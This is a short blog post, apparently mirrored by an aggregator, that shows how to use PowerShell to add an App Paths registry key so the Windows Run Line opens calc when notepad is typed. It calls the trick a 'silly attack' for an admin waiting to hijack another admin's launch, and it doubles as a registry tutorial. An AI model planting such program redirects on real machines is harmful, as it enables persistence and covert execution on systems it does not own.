7

Silly Attack Using Run Line

 3 years ago
source link: https://parsiya.net/blog/2017-10-26-silly-attack-using-run-line/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Oct 26, 2017 - 2 minute read - Comments - Windows

Silly Attack Using Run Line

Previously we saw how Windows Run Line searches in App Paths registry keys before PATH. We can perform a silly attack and create a registry key for an application in path and point it to another command.

This is a silly attack because we need to be admin to create/edit those keys. But if you ever find yourself in the unlikely situation, you can use this to become delayed admin (i.e. wait for admin to run the app via Run Line).

This also serves as a tutorial note for using PowerShell to list/manipulate registry.

Let"s pick notepad which is in PATH and point it to calc. Open an admin PowerShell prompt.

First check if key exists (note we have tab auto-complete inside registry):

# notepad does not have an entry
$ Test-Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe"
False
# chrome does
$ Test-Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe"
True

Now create the key and set the default property:

$ New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths"
        -Name notepad.exe -Value "C:\Windows\System32\calc.exe"

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths

SKC  VC Name                           Property
---  -- ----                           --------
  0   1 notepad.exe                    {(default)}

We could have set the default value later using Set-Item:

$ Set-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe"
           -Value "C:\Windows\System32\calc.exe"

To create new properties use New-ItemProperty. For example the property Path contains the working directory:

$ New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe" 
                   -Name Path -Value "C:\Windows\System32\"

PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
               \Windows\CurrentVersion\App Paths\notepad.exe
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
               \Windows\CurrentVersion\App Paths
PSChildName  : notepad.exe
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry
Path         : C:\Windows\System32\

ls/gci/Get-ChildItem do not list the properties, only registry keys.

$ ls -path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\"
    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths

SKC  VC Name                           Property
---  -- ----                           --------
  0   2 chrome.exe                     {(default), Path}
  0   2 notepad.exe                    {(default), Path}

$ ls -path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe"

We need to get each property one by one (or use a PS script to run $Key.GetValueNames() and iterate over them).

Now open up Run Line and enter notepad to see calc pop up.

Silly attack because only admins can edit those registry keys.

Posted by Parsia Oct 26, 2017 Tags: Run Line

Run Line vs. cmd vs. PowerShell WinAppDbg - Part 1 - Basics


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK